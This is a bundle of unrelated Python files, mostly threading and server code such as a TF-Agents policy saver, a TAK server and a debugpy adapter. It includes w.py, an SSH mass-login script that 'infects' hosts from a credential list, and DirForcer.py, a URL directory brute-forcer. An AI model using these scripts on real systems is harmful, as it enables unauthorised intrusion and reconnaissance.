distances = [np.linalg.norm(user_embedding - self.sentence_transformer.encode(sentence)) for sentence in sentences]
min_index = np.argmin(distances)
MAX_ACCEPTABLE_DISTANCE = 10
if distances[min_index] < MAX_ACCEPTABLE_DISTANCE:
return sentences[min_index]
return None
def speech_to_text(self, wave):
nbests = self.speech2text(wave)
text, *_ = nbests[0]
return text
import inspect
import importlib
import queue
agent = TsukuyomichanAgent()
conversations = []
module = importlib.import_module("conversations.basic_conversations")
for _, obj in inspect.getmembers(module):
if inspect.isclass(obj) and inspect.getmodule(obj) == module:
if abc.ABC not in obj.__bases__:
conversations.append(obj(agent))
queue_obj = queue.Queue()
def get_sound_events():
while True:
event = agent.listen_voice_event()
queue_obj.put_nowait(event)
threading.Thread(target=get_sound_events, daemon=True).start()
while True:
event = None
try:
event = queue_obj.get_nowait()
except queue.Empty:
pass
for conversation in conversations:
if (event is not None and conversation.react_to(event)) or conversation.fire():
conversation.start(event, agent)
break
|
async_policy_saver.py
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Async helper for the policy saver."""
import threading
from typing import Text
from absl import logging
from tf_agents.policies import policy_saver as policy_saver_module
class AsyncPolicySaver(object):
"""Triggers `policy_saver` save calls in a separate thread asynchronously."""
def __init__(self, policy_saver: policy_saver_module.PolicySaver):
"""Initialize an AsyncPolicySaver.
Args:
policy_saver: An instance of a `policy_saver.PolicySaver`.
"""
self._policy_saver = policy_saver
self._save_condition_variable = threading.Condition()
# These vars should only be accessed if the lock in save_condition is held.
# export_dir is set to None whenever there is no pending save. Otherwise it
# is used to communicate across threads.
self._export_dir = None
self._saving_checkpoint = False
self._join_save_thread = False
self._save_thread = threading.Thread(target=self._save_loop)
self._save_thread.start()
def _save_loop(self):
"""Helper method for the saving thread to wait and execute save requests."""
while True:
with self._save_condition_variable:
while not self._export_dir and not self._join_save_thread:
self._save_condition_variable.wait()
if self._join_save_thread:
return
if self._saving_checkpoint:
logging.info("Saving checkpoint to %s", self._export_dir)
self._policy_saver.save_checkpoint(self._export_dir)
else:
logging.info("Saving policy to %s", self._export_dir)
self._policy_saver.save(self._export_dir)
self._export_dir = None
self._save_condition_variable.notify()
def _assert_save_thread_is_alive(self):
if self._join_save_thread or not self._save_thread.is_alive():
raise ValueError("Saving thread in AsyncPolicySaver is not alive. Either "
"an exception has occured while saving, or the saver "
"was closed.")
def save(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy to the given `export_dir`.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the `saved_model` of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=False, blocking=blocking)
def save_checkpoint(self, export_dir: Text, blocking: bool = False):
"""Triggers an async save of the policy checkpoint.
Only one save can be triggered at a time. If `save` or `save_checkpoint`
are called while another save of either kind is still ongoing the saving is
skipped.
If blocking is set then the call will block until any ongoing saves finish,
and then a new save will be made before returning.
Args:
export_dir: Directory path for the checkpoint of the policy.
blocking: If True the call to save will block until a save can be
performed and finished. If a save was ongoing it will wait for that to
finish, and then do a blocking save before returning.
"""
self._save(export_dir, saving_checkpoint=True, blocking=blocking)
def _save(self, export_dir, saving_checkpoint, blocking):
"""Helper save method, generalizes over save and save_checkpoint."""
self._assert_save_thread_is_alive()
if blocking:
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
if saving_checkpoint:
self._policy_saver.save_checkpoint(export_dir)
else:
self._policy_saver.save(export_dir)
return
if not self._save_condition_variable.acquire(blocking=False):
logging.info("AsyncPolicySaver save is still in progress skipping save.")
return
try:
self._saving_checkpoint = saving_checkpoint
self._export_dir = export_dir
self._save_condition_variable.notify()
finally:
self._save_condition_variable.release()
def flush(self):
"""Blocks until there is no saving happening."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
def close(self):
"""Blocks until there is no saving happening and kills the save_thread."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
self._join_save_thread = True
self._save_condition_variable.notify()
self._save_thread.join()
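# Illustrative usage sketch; constructing the wrapped PolicySaver is assumed
# to happen elsewhere (e.g. policy_saver_module.PolicySaver(agent.policy)):
#
#     saver = AsyncPolicySaver(policy_saver)
#     saver.save('/tmp/policy')            # returns immediately
#     saver.save_checkpoint('/tmp/ckpt')   # skipped if a save is in flight
#     saver.flush()                        # block until no save is pending
#     saver.close()                        # stop the background save thread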
|
server.py
|
#######################################################
#
# TAKFreeServer.py
# Original author: naman108
# This code is Open Source, made available under the EPL 2.0 license.
# https://www.eclipse.org/legal/eplfaq.php
# credit to Harshini73 for base code
#
#######################################################
import argparse
import datetime
import logging
import os
import socket
import sqlite3
import sys
import threading
import time
import traceback
import uuid
import xml.etree.ElementTree as ET
from logging.handlers import RotatingFileHandler
import constants
import SQLcommands
from Controllers.RequestCOTController import RequestCOTController
from Controllers.serializer import Serializer
const = constants.vars()
sql = SQLcommands.sql()
def newHandler(filename, log_level, log_format):
handler = RotatingFileHandler(
filename,
maxBytes=const.MAXFILESIZE,
backupCount=const.BACKUPCOUNT
)
handler.setFormatter(log_format)
handler.setLevel(log_level)
return handler
log_format = logging.Formatter(const.LOGFORMAT)
logger = logging.getLogger(const.LOGNAME)
logger.setLevel(logging.DEBUG)
logger.addHandler(newHandler(const.DEBUGLOG, logging.DEBUG, log_format))
logger.addHandler(newHandler(const.WARNINGLOG, logging.WARNING, log_format))
logger.addHandler(newHandler(const.INFOLOG, logging.INFO, log_format))
console = logging.StreamHandler(sys.stdout)
console.setFormatter(log_format)
console.setLevel(logging.DEBUG)
logger.addHandler(console)
''' Server class '''
class ThreadedServer(object):
def __init__(self, host=const.IP, port=const.PORT):
# change from string
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
self.client_dict = {}
logger.info(f"Server IP: {host}, server port: {port}")
self.emergencyDict = {}
# configure sql database
with sqlite3.connect(const.DATABASE) as db:
cursor = db.cursor()
cursor.execute(sql.CREATEUSERSTABLE)
cursor.close()
db.commit()
self.bandaidUID = ''
def listen(self):
'''
listen for client connections and begin thread if found
'''
threading.Thread(target=self.bandaid, args=(), daemon=True).start()
self.sock.listen(1000)
while True:
try:
client, address = self.sock.accept()
threading.Thread(target=self.listenToClient, args=(client, address), daemon=True).start()
except:
logger.error(traceback.format_exc())
logger.error('Error in listen()')
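# bandaid() appears to be a periodic self-ping keepalive: every RENEWTIME
# minutes it opens a short-lived connection to the server's own port, sends a
# ping CoT with a known UID, and closes. connectionSetup() recognizes that
# UID and returns 'Bandaid' so the connection is handled specially instead of
# being registered as a client.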
def bandaid(self):
while True:
try:
start = datetime.datetime.now()
end = start + datetime.timedelta(minutes=const.RENEWTIME)
while datetime.datetime.now() < end:
time.sleep(10)
self.bandaidUID = uuid.uuid1()
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect(('127.0.0.1', const.PORT))
mysock.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid=self.bandaidUID)).encode())
mysock.recv(2048)
mysock.shutdown(socket.SHUT_RDWR)
mysock.close()
logger.info('finished bandaid keepalive')
logger.debug(f"Currently running {len(threading.enumerate())} threads")
except ConnectionRefusedError:
logger.warning("Bandaid listening socket was closed")
except:
logger.error(traceback.format_exc())
logger.error("Error in bandaid()")
def check_xml(self, xml_string, current_id):
'''
Classify an incoming CoT/XML message (disconnect, ping, GeoChat, emergency,
or routed data) and queue it for the appropriate connected clients.
'''
data_value = ''
try:
if xml_string == const.EMPTY_BYTE:
logger.info('client disconnected via empty byte response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
elif xml_string == None:
logger.info('client disconnected via none response')
self.client_dict[current_id]['alive'] = 0
logger.info(str(self.client_dict[current_id]['uid'])+' disconnected')
return const.FAIL
tree = ET.fromstring(xml_string)
uid = tree.get('uid')
logger.debug('parsing data uid is ' + str(uid))
cot_type = tree.get('type')
if cot_type == "a-f-G-U-C":
self.client_dict[current_id]['id_data'] = xml_string
elif cot_type == 'b-f-t-a':
destination = tree.find('detail').find('marti').find('dest').attrib['callsign']
connData = self.client_dict[current_id]["id_data"]
for x in self.client_dict:
if self.client_dict[x]["callsign"] == destination:
self.client_dict[x]["main_data"].append(connData)
logger.info('adding conn data to '+str(x))
logger.info(f"Now adding the following connection data: {str(connData)}")
if uid.endswith("9-1-1"):
for x in tree.iter('emergency'):
if x.get('cancel') != 'true':
self.emergencyDict[uid] = xml_string
else:
del self.emergencyDict[uid]
elif uid.endswith(const.PING):
data_value = const.PING
logger.debug(f"Received a ping: {xml_string}")
elif uid.startswith(const.GEOCHAT):
data_value = const.GEOCHAT
logger.debug(f"Received a GeoChat: {xml_string}")
else:
logger.debug(f"Received CoT: {xml_string}")
# adds data to all connected client data list except sending client
for detail in tree.findall('detail'):
marti = detail.find('marti')
if marti != None:
dest = marti.find('dest')
callsign = dest.attrib['callsign']
for client_id in self.client_dict:
if self.client_dict[client_id]['callsign'] == callsign:
self.client_dict[client_id]['main_data'].append(xml_string)
else:
for client_id in self.client_dict:
if client_id != current_id:
self.client_dict[client_id]['main_data'].append(xml_string)
return data_value
except:
logger.error(traceback.format_exc())
logger.error(f"Error in check_xml for: {xml_string}")
def connectionSetup(self, client, address):
db = sqlite3.connect(const.DATABASE)
try:
cursor = db.cursor()
first_run = 1
# Create this client's entry in the main client dictionary: queued outgoing data plus identifying information gathered at initial connection
total_clients_connected = 0
total_clients_connected += 1
id_data = client.recv(const.STARTBUFFER)
logger.debug(f"id_data = {id_data}")
tree = ET.fromstring(id_data)
uid = tree.get('uid')
if uid == self.bandaidUID:
return 'Bandaid'
callsign = tree.find('detail').find('contact').attrib['callsign']
current_id = uuid.uuid1().int
# add identifying information
self.client_dict[current_id] = {
'id_data': id_data,
'main_data': [],
'alive': 1,
'uid': uid,
'client': client,
'callsign': callsign
}
cursor.execute(sql.INSERTNEWUSER, (str(current_id), str(uid), str(callsign)))
cursor.close()
db.commit()
logger.info(f"Client connected, initial information for current_id={current_id}: {self.client_dict[current_id]}")
return str(first_run)+' ? '+str(total_clients_connected)+' ? '+str(id_data)+' ? '+str(current_id)
except:
logger.error(traceback.format_exc())
logger.error('Error in connection setup')
return "error"
finally:
db.close()
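# recieveAll() keeps calling recv(BUFFER) and appending chunks until a chunk
# smaller than a full buffer arrives. The const.BUFFER+33 comparison appears
# to rely on sys.getsizeof() of a bytes object being its length plus a fixed
# CPython overhead of 33 bytes, so an exactly-full chunk means "more data is
# coming" and a smaller one marks the end of the message.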
def recieveAll(self, client):
try:
total_data = []
while True:
data = client.recv(const.BUFFER)
logger.debug(f"Received {sys.getsizeof(data)} bytes from {client}")
if sys.getsizeof(data) == const.BUFFER+33:
total_data.append(data)
elif sys.getsizeof(data) < const.BUFFER+33:
total_data.append(data)
break
total_data = b''.join(total_data)
return total_data
except:
logger.error(traceback.format_exc())
logger.error(f"Error in recieveAll() from {client}")
return None
def listenToClient(self, client, address):
'''
Receive and process data from a connected client for the lifetime of the connection.
'''
try:
defaults = self.connectionSetup(client, address)
if defaults == 'error':
client.shutdown(socket.SHUT_RDWR)
client.close()
return
elif defaults == 'Bandaid':
self.sock.shutdown(socket.SHUT_RDWR)
client.close()
return
else:
defaults = defaults.split(' ? ')
logger.debug(defaults)
first_run = int(defaults[0])
id_data = bytes(defaults[2], 'utf-8')
current_id = int(defaults[3])
# main connection loop
while True:
# Receive data
try:
if first_run == 0:
data = self.recieveAll(client)
logger.debug(f"Received data from client: {str(data)}")
working = self.check_xml(data, current_id)
# checking if check_xml detected client disconnect
if working == const.FAIL:
timeoutInfo = Serializer().serializerRoot(RequestCOTController().timeout(
eventhow='h-g-i-g-o',
eventuid=uuid.uuid1(),
linkuid=self.client_dict[current_id]['uid']
))
logger.debug(f"Sending timeout: {timeoutInfo.encode()}")
for client_id in self.client_dict:
if client_id != current_id:
self.client_dict[client_id]['client'].send(timeoutInfo.encode())
uid = self.client_dict[current_id]['uid']
del self.client_dict[current_id]
with sqlite3.connect(const.DATABASE) as db:
cursor = db.cursor()
cursor.execute(sql.DELETEBYUID, (uid,))
cursor.close()
db.commit()
client.shutdown(socket.SHUT_RDWR)
client.close()
return
elif working == const.PING:
logger.debug('Received ping')
elif first_run == 1:
for client_id in self.client_dict:
client = self.client_dict[client_id]['client']
if client != self.client_dict[current_id]['client']:
logger.info('Sending '+str(id_data))
client.send(self.client_dict[current_id]['id_data'])
for client_id in self.client_dict:
data = self.client_dict[client_id]['id_data']
logger.debug('Sending conn data to '+str(client))
client.send(data)
threading.Thread(
target=self.sendClientData,
args=(client, address, current_id),
daemon=True).start()
# initial exchange complete; subsequent iterations handle normal traffic
first_run = 0
except:
logger.error(traceback.format_exc())
logger.error('Error in listenToClient() main loop')
client.close()
return
except Exception as e:
logger.error(traceback.format_exc())
logging.error("Unknown error in listenToClient")
client.close()
def sendClientData(self, client, address, current_id):
try:
while True:
time.sleep(const.DELAY)
for uid in self.emergencyDict:
client.send(self.emergencyDict[uid])
logger.info(f"Emergency activated: {uid}")
if len(self.client_dict[current_id]['main_data']) > 0:
for x in self.client_dict[current_id]['main_data']:
logger.debug(self.client_dict[current_id]['main_data'])
client.send(x)
logger.info('Sent ' + str(x) + ' to ' + str(address))
self.client_dict[current_id]['main_data'].remove(x)
else:
client.send(Serializer().serializerRoot(RequestCOTController().ping(eventuid=uuid.uuid1())).encode())
except:
logger.error(traceback.format_exc())
logger.warning('Error in sendClientData')
finally:
client.close()
def startup():
logger.info('starting windows service')
ThreadedServer(host=const.IP, port=const.PORT).listen()
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser()
parser.add_argument("-p", type=int)
args = parser.parse_args()
port = args.p if args.p is not None else const.PORT
except:
logger.error(f"Failed to read port number from command arguments, defaulting to {const.PORT}")
port = const.PORT
ThreadedServer(host=const.IP, port=port).listen()
|
w.py
|
#!/usr/bin/python
import sys, re, os, paramiko
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
paramiko.util.log_to_file("/dev/null")
cmd=""
r34d = open(str(sys.argv[1]),'a+')
print "\033[31mStarting Scan!\n"
def w0rk(username,password,ip):
try:
port = 22
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
print "\033[32m[\033[31m+\033[32m] Infecting:\x1b[31m "+ip+"\x1b[31m\n"
ssh.exec_command(""+cmd+"")
ssh.close()
except:
pass
for line in r34d:
ip_1nfo = line.split(":")
g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],))
g0d.start()
username=ip_1nfo[0]
password=ip_1nfo[1]
ip=ip_1nfo[2]
g0d.join()
|
interval_runner.py
|
import threading
from threading import Thread, Event
from typing import Callable
class IntervalRunner:
event: Event
thread: Thread
def __init__(self, target: Callable[[], None], interval_seconds: float = 0.1):
self.event = threading.Event()
self.target = target
self.interval_seconds = interval_seconds
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
def _run(self) -> None:
while not self.event.is_set():
self.target()
self.event.wait(self.interval_seconds)
def start(self) -> "IntervalRunner":
self.thread.start()
return self
def is_alive(self) -> bool:
return self.thread is not None and self.thread.is_alive()
def shutdown(self):
if self.thread.is_alive():
self.event.set()
self.thread.join()
self.thread = None
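# Illustrative usage sketch; `heartbeat` is a hypothetical callback:
#
#     def heartbeat() -> None:
#         print("tick")
#
#     runner = IntervalRunner(heartbeat, interval_seconds=1.0).start()
#     ...                     # do other work
#     runner.shutdown()       # sets the event and joins the daemon thread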
|
utils.py
|
def secureErase(file, passes, securityLevel):
import random
import os
import sys
FileNameLength = 50
charList = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-=[];,./!@#$%^&*(){}|_+<>?')
# Check if the file exists
if not os.path.exists(file):
sys.exit(str(file) + " does not exist")
# Run the amount of passes
for i in range(0, passes):
# Open file
with open(file, 'r', encoding="utf8", errors='ignore') as f:
fileData = f.read().splitlines()
# Wipe current data in file
with open(file, 'w') as f:
f.write('')
# Get data and prepare to write to the file
for line in fileData:
writeString = ''
# Get length of line and create a string with that length
for write in range(0, len(line) * securityLevel):
writeString += str(charList[random.randint(0, len(charList) - 1)])
# Write string to file
try:
with open(file, 'a') as f:
f.write(str(writeString) + '\n')
except:
pass
# Remove scrambled file
os.remove(file)
def selectScreen():
import os
import PySimpleGUI as sg
sg.theme("DarkBlue")
layout = [
[sg.Text("USB Locker v1.5", font=("Arial", 25))],
[sg.Text("Select a drive from the list below and press 'Lock Drive'", size=(49, 1)),
sg.Button("Refresh List", size=(13, 1))],
[sg.Listbox(scanDrives(), size=(71, 10), key="driveList")],
[sg.Text("Password:"), sg.InputText(size=(62, 1), key="passwordInput")],
[sg.Button("Lock Drive", size=(27, 1)), sg.Button("Unlock Drive", size=(27, 1)), sg.Button("Close")],
[sg.Text("Creaded by: @IWick | https://github.com/iwickgames/", justification="center", size=(65, 1))]
]
window = sg.Window("USB Locker - Select a USB to lock", layout=layout)
while True:
event, values = window.read()
if event == sg.WINDOW_CLOSED or event == "Close":
return "Exit", None, None
if event == "Refresh List":
window["driveList"].Update(scanDrives())
if event == "Lock Drive":
if not values["driveList"]:
sg.popup_error("You must select a drive to lock")
elif not values["passwordInput"]:
sg.popup_error("You must put in a password")
elif os.path.exists(values["driveList"][0] + "usblock.usbpass"):
sg.popup_error("This drive is already locked")
else:
window.close()
return "lock", values["driveList"][0], values["passwordInput"]
if event == "Unlock Drive":
if not values["driveList"]:
sg.popup_error("You must select a drive to unlock")
elif not values["passwordInput"]:
sg.popup_error("You must put in a password")
elif not os.path.exists(values["driveList"][0] + "usblock.usbpass"):
sg.popup_error("This drive is not locked")
else:
window.close()
return "unlock", values["driveList"][0], values["passwordInput"]
def scanDrives():
import os
drives = []
for div in list("ABDEFGHIJKLMNOPQRSTUVWSYZ"):
if os.path.exists(f"{div}:/"):
drives.append(f"{div}:/")
return drives
def dirAllFP(path):
import os
filesList = []
for dirpath, subdirs, files in os.walk(path):
for x in files:
filesList.append(os.path.join(dirpath, x))
return filesList
def lockDrive(drive, password):
import os
import hashlib
import threading
import pyAesCrypt
import PySimpleGUI as sg
def file_encryption(file, fileName, password):
try:
pyAesCrypt.encryptFile(file, fileName, password, 64 * 1024)
os.remove(file)
#secureErase(file, 2, 2)
except:
pass
indexDrive = dirAllFP(drive)
sg.theme("DarkBlue")
layout = [
[sg.Text("Locking Drive " + drive, font=("Arial", 20))],
[sg.ProgressBar(len(indexDrive), orientation="h", size=(50, 20), key="progressBar")]
]
window = sg.Window("Locking drive", layout=layout)
fileLocateion = 0
for file in indexDrive:
fileName = file + ".usblock"
encryption = threading.Thread(target=file_encryption, args=(file, fileName, password))
encryption.start()
while encryption.is_alive():
event, values = window.read(timeout=0)
if event == sg.WINDOW_CLOSED:
window.close()
window["progressBar"].update_bar(fileLocateion)
fileLocateion += 1
window["progressBar"].update_bar(fileLocateion)
with open(drive + "usblock.usbpass", "w") as f:
f.write(hashlib.sha256(password.encode("utf-8")).hexdigest())
sg.popup("Drive " + drive + " was successfully locked")
window.close()
def unlockDrive(drive, password):
import os
import hashlib
import threading
import pyAesCrypt
import PySimpleGUI as sg
def unlock_drive(file, fileName, password):
try:
pyAesCrypt.decryptFile(file, fileName, password, 64 * 1024)
os.remove(file)
except:
pass
indexDrive = dirAllFP(drive)
sg.theme("DarkBlue")
layout = [
[sg.Text("Unlocking Drive " + drive, font=("Arial", 20))],
[sg.ProgressBar(len(indexDrive), orientation="h", size=(50, 20), key="progressBar")]
]
window = sg.Window("Unlocking drive", layout=layout)
with open(drive + "usblock.usbpass") as f:
if not hashlib.sha256(password.encode("utf-8")).hexdigest() == f.read():
return "IncorrectPassword"
fileLocation = 0
for file in indexDrive:
fileName = file.replace(".usblock", "")
decrypt = threading.Thread(target=unlock_drive, args=(file, fileName, password))
decrypt.start()
while decrypt.is_alive():
event, values = window.read(timeout=0)
if event == sg.WINDOW_CLOSED:
window.close()
window["progressBar"].update_bar(fileLocation)
fileLocation += 1
window["progressBar"].update_bar(fileLocation)
os.remove(drive + "usblock.usbpass")
sg.popup("Drive " + drive + " was successfully unlocked")
window.close()
|
multiprocessing_namespaces.py
|
# Copyright (c) 2009 Doug Hellmann All rights reserved.
#
"""
"""
# end_pymotw_header
import multiprocessing
def producer(ns, event):
ns.value = "This is the value"
event.set()
def consumer(ns, event):
try:
print("Before event: {}".format(ns.value))
except Exception as err:
print("Before event, error:", str(err))
event.wait()
print("After event:", ns.value)
if __name__ == "__main__":
mgr = multiprocessing.Manager()
namespace = mgr.Namespace()
event = multiprocessing.Event()
p = multiprocessing.Process(target=producer, args=(namespace, event))
c = multiprocessing.Process(target=consumer, args=(namespace, event))
c.start()
p.start()
c.join()
p.join()
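# With both processes running, the consumer typically reports an
# AttributeError for "Before event" (the attribute is not set yet) and then
# prints "After event: This is the value" once the producer has set it.
# Note that Namespace updates are only propagated when an attribute is
# reassigned; mutating a stored value in place (e.g. appending to a list held
# on the namespace) is not visible to other processes.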
|
timer.py
|
from threading import Thread
class Timer:
def __init__(self, config, bus):
self.bus = bus
bus.register('tick')
self.sleep = config['sleep']
self.thread = Thread(target=self.run)
def start(self):
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout=timeout)
def run(self):
while self.bus.is_alive():
self.bus.publish('tick', None)
self.bus.sleep(self.sleep)
def request_stop(self):
self.bus.shutdown()
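# Illustrative usage sketch; `bus` is a hypothetical object exposing the
# register/publish/sleep/is_alive/shutdown interface used above:
#
#     timer = Timer(config={'sleep': 0.5}, bus=bus)
#     timer.start()           # publishes a 'tick' message every 0.5 s
#     ...
#     timer.request_stop()    # shuts the bus down, which ends run()
#     timer.join()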
|
DirForcer.py
|
#!/usr/bin/env python3
import argparse
import queue
import sys
import threading
import urllib.error
import urllib.parse
import urllib.request
sys.exit("Use the -h parameter to learn about using the program.") if len(sys.argv[1:]) == 0 else True
description = "DirForcer is a brute-forcing tool designed to brute force an URL " \
"and get a list of accessible directories from it."
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-t", "--target", type=str, help="Target URL")
parser.add_argument("-w", "--wordlist", type=str, help="Path to the wordlist.")
parser.add_argument("-e", "--extension", help="An extension list to use while brute forcing. OPTIONAL "
"default: [ .php , .bak .orig, .inc ]",
action="store_true")
args = parser.parse_args()
thread_count = 25
target_url = args.target
wordlist = args.wordlist
extensions = [".php", ".bak", ".orig", ".inc"]
if args.extension:
extensions = args.extension
resume = None
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
# Open the wordlist and read each word from it. Put the words in the wordlist into a queue (words_queue)
def build_wordlist(wordlist_file):
try:
file = open(wordlist_file, "r")
except OSError:
sys.exit("Wordlist not found in the location. Are you in the same directory as it?")
raw_words = file.readlines()
file.close()
found_resume = False
words_queue = queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words_queue.put(word)
else:
if word == resume:
found_resume = True
print("Resuming wordlist from: %s" % resume)
else:
words_queue.put(word)
return words_queue
# Brute force the URL using the directory list from build_wordlist and add extensions(optional)
def bruter(words, extension_file=None):
while not words.empty():
attempt = words.get()
attempt_list = []
# check if there is a file extension. If there is a file extension, we're brute forcing a file.
# If there isn't an extension, we're brute forcing a path.
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
# Is there an extension list?
if extension_file:
for extension in extension_file:
attempt_list.append("/%s%s" % (attempt, extension))
# Actual brute force part
for brute in attempt_list:
url = "%s%s" % (target_url, urllib.parse.quote(brute))
try:
headers = {"User-Agent": user_agent}
r = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(r)
if len(response.read()):
print("[%d] => %s" % (response.code, url))
except urllib.error.URLError as e:
if hasattr(e, "code") and e.code != 404:
print("!!! %d => %s" % (e.code, url))
pass
word_queue = build_wordlist(wordlist)
for i in range(thread_count):
t = threading.Thread(target=bruter, args=(word_queue, extensions,))
t.start()
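# Example invocation (added sketch; the host and wordlist path are placeholders):
#
#   python3 DirForcer.py -t http://example.com -w wordlist.txt -e .php .bak
#
# Every word is requested as /word/ (or /word when it already contains a dot),
# plus one request per configured extension (the default list above, or the
# values passed with -e).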
|
servers.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import subprocess
import sys
import threading
import time
import debugpy
from debugpy import adapter
from debugpy.common import compat, fmt, json, log, messaging, sockets
from debugpy.adapter import components
access_token = None
"""Access token used to authenticate with the servers."""
_lock = threading.RLock()
_connections = []
"""All servers that are connected to this adapter, in order in which they connected.
"""
_connections_changed = threading.Event()
class Connection(object):
"""A debug server that is connected to the adapter.
Servers that are not participating in a debug session are managed directly by the
corresponding Connection instance.
    Servers that are participating in a debug session are managed by that session's
Server component instance, but Connection object remains, and takes over again
once the session ends.
"""
def __init__(self, sock):
from debugpy.adapter import sessions
self.disconnected = False
self.server = None
"""The Server component, if this debug server belongs to Session.
"""
self.pid = None
stream = messaging.JsonIOStream.from_socket(sock, str(self))
self.channel = messaging.JsonMessageChannel(stream, self)
self.channel.start()
try:
self.authenticate()
info = self.channel.request("pydevdSystemInfo")
process_info = info("process", json.object())
self.pid = process_info("pid", int)
self.ppid = process_info("ppid", int, optional=True)
if self.ppid == ():
self.ppid = None
self.channel.name = stream.name = str(self)
debugpy_dir = os.path.dirname(os.path.dirname(debugpy.__file__))
# Note: we must check if 'debugpy' is not already in sys.modules because the
# evaluation of an import at the wrong time could deadlock Python due to
# its import lock.
#
# So, in general this evaluation shouldn't do anything. It's only
# important when pydevd attaches automatically to a subprocess. In this
# case, we have to make sure that debugpy is properly put back in the game
            # for users to be able to use it.
#
# In this case (when the import is needed), this evaluation *must* be done
# before the configurationDone request is sent -- if this is not respected
# it's possible that pydevd already started secondary threads to handle
# commands, in which case it's very likely that this command would be
# evaluated at the wrong thread and the import could potentially deadlock
# the program.
#
# Note 2: the sys module is guaranteed to be in the frame globals and
# doesn't need to be imported.
inject_debugpy = """
if 'debugpy' not in sys.modules:
sys.path.insert(0, {debugpy_dir!r})
try:
import debugpy
finally:
del sys.path[0]
"""
inject_debugpy = fmt(inject_debugpy, debugpy_dir=debugpy_dir)
try:
self.channel.request("evaluate", {"expression": inject_debugpy})
except messaging.MessageHandlingError:
# Failure to inject is not a fatal error - such a subprocess can
# still be debugged, it just won't support "import debugpy" in user
# code - so don't terminate the session.
log.swallow_exception(
"Failed to inject debugpy into {0}:", self, level="warning"
)
with _lock:
# The server can disconnect concurrently before we get here, e.g. if
# it was force-killed. If the disconnect() handler has already run,
# don't register this server or report it, since there's nothing to
# deregister it.
if self.disconnected:
return
if any(conn.pid == self.pid for conn in _connections):
raise KeyError(
fmt("{0} is already connected to this adapter", self)
)
is_first_server = len(_connections) == 0
_connections.append(self)
_connections_changed.set()
except Exception:
log.swallow_exception("Failed to accept incoming server connection:")
self.channel.close()
# If this was the first server to connect, and the main thread is inside
# wait_until_disconnected(), we want to unblock it and allow it to exit.
dont_wait_for_first_connection()
# If we couldn't retrieve all the necessary info from the debug server,
# or there's a PID clash, we don't want to track this debuggee anymore,
# but we want to continue accepting connections.
return
parent_session = sessions.get(self.ppid)
if parent_session is None:
log.info("No active debug session for parent process of {0}.", self)
else:
try:
parent_session.client.notify_of_subprocess(self)
return
except Exception:
# This might fail if the client concurrently disconnects from the parent
# session. We still want to keep the connection around, in case the
# client reconnects later. If the parent session was "launch", it'll take
# care of closing the remaining server connections.
log.swallow_exception(
"Failed to notify parent session about {0}:", self
)
# If we got to this point, the subprocess notification was either not sent,
# or not delivered successfully. For the first server, this is expected, since
# it corresponds to the root process, and there is no other debug session to
# notify. But subsequent server connections represent subprocesses, and those
# will not start running user code until the client tells them to. Since there
# isn't going to be a client without the notification, such subprocesses have
# to be unblocked.
if is_first_server:
return
log.info("No clients to wait for - unblocking {0}.", self)
try:
self.channel.request("initialize", {"adapterID": "debugpy"})
self.channel.request("attach", {"subProcessId": self.pid})
self.channel.request("configurationDone")
self.channel.request("disconnect")
except Exception:
log.swallow_exception("Failed to unblock orphaned subprocess:")
self.channel.close()
def __str__(self):
return "Server" + fmt("[?]" if self.pid is None else "[pid={0}]", self.pid)
def authenticate(self):
if access_token is None and adapter.access_token is None:
return
auth = self.channel.request(
"pydevdAuthorize", {"debugServerAccessToken": access_token}
)
if auth["clientAccessToken"] != adapter.access_token:
self.channel.close()
raise RuntimeError('Mismatched "clientAccessToken"; server not authorized.')
def request(self, request):
raise request.isnt_valid(
"Requests from the debug server to the client are not allowed."
)
def event(self, event):
pass
